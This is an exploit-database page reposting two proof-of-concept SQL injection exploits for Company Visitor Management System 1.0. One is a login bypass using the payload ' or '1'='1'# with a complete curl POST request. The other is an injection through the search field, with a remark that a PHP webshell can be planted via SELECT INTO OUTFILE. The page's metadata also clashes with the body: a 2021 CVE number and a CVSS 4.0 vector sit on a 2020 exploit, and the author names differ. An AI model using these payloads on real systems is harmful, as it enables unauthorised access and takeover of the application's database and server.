Advertisement






Company Visitor Management System (CVMS) 1.0 SQL Injection

CVE Category Price Severity
CVE-2021-41165 CWE-89 Not specified High
Author Risk Exploitation Type Date
Kamran Slaoui High Remote 2020-07-21
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070113

Below is a copy:

Company Visitor Management System (CVMS) 1.0 SQL Injection
# Exploit Title: Company Visitor Management System (CVMS) 1.0 - Authentication Bypass
# Date: 2020-07-20
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://phpgurukul.com/company-visitor-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=9602
# Version: V1.0
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)


Vulnerable File:
---------------- 
/index.php


Vulnerable Code:
-----------------
line 8: $adminuser=$_POST['username'];

Vulnerable Issue:
-----------------
$adminuser=$_POST['username']; is not filtered correcty


POC:
----

URL: http://localhost/cvms/index.php
Username : ' or '1'='1'#
Password : anything


Sample Request:

curl -i -s -k --location --request POST 'http://localhost/cvms/index.php' \
--header 'Origin: http://localhost:88' \
--header 'Cookie: PHPSESSID=2fco8hh2r5ccveq520n33chc80' \
--header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \
--header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0' \
--header 'Connection: close' \
--header 'Referer: http://localhost:88/cvms/index.php' \
--header 'Host: localhost:88' \
--header 'Accept-Encoding: gzip, deflate' \
--header 'Upgrade-Insecure-Requests: 1' \
--header 'Accept-Language: en-US,en;q=0.5' \
--header 'Content-Length: 61' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-raw 'username=%27+or+%271%27%3D%271%27%23&password=anything&login='



----


# Exploit Title: Company Visitor Management System (CVMS) 1.0 - 'searchdata' SQL Injection
# Date: 2020-07-20
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://phpgurukul.com/company-visitor-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=9602
# Version: V1.0
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)


Vulnerable File:
---------------- 
\search-visitor.php


Vulnerable Code:
-----------------
line 77: $sdata=$_POST['searchdata'];

Vulnerable Issue:
-----------------
$sdata=$_POST['searchdata']; is not filtered correcty

[+] Any authenticated user/client can inject the following payload inside the Search Form
[+] Attacker can inject php webshell using SELECT INTO OUTFILE method through this entry point


POC:
----

Payload:

searchdata=%27+or+%271%27%3D%271%27%23&search=

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum